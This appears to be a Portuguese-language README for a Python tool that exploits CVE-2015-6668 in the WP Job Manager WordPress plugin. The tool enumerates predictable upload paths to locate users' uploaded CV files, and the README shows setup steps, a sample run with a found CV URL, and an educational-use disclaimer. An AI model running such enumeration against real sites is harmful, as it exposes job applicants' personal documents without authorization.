
CVE-2015-6668, relacionada com o plugin WP Job Manager para WordPress (versões ≤ 0.7.25).
Este script automatiza a busca de arquivos de CV (como .jpg, .png, .jpeg) expostos publicamente por meio da vulnerabilidade CVE-2015-6668, relacionada ao plugin WP Job Manager para WordPress (versões ≤ 0.7.25).
A vulnerabilidade permite descobrir o nome exato de um arquivo enviado pelos usuários (por exemplo, currículos) acessando diretamente rotas de upload previsíveis no servidor web.
Este script:
tqdm.found_cv_urls.txt.Instale as dependências executando:
pip install -r requirements.txt
requirements.txtrequests
tqdm
colorama
python jobmanagerdisclosure.py
Enter a vulnerable website (e.g. https://example.com): https://example.com
Enter the CV file name (e.g. John Doe): HackerAccessGranted
Enter start year (e.g. 2017): 2017
Enter end year (e.g. 2019): 2019
[+] Found CV: https://example.com/wp-content/uploads/2018/04/HackerAccessGranted.png
[+] Results saved to found_cv_urls.txt
jobmanagerdisclosure.py: Script principal.requirements.txt: Bibliotecas necessárias.found_cv_urls.txt: Arquivo gerado com URLs encontradas.README.md: Documentação do projeto.Este script é fornecido apenas para fins educacionais. Não se destina a ser utilizado em sistemas sem autorização explícita. O uso não autorizado deste script pode ser ilegal.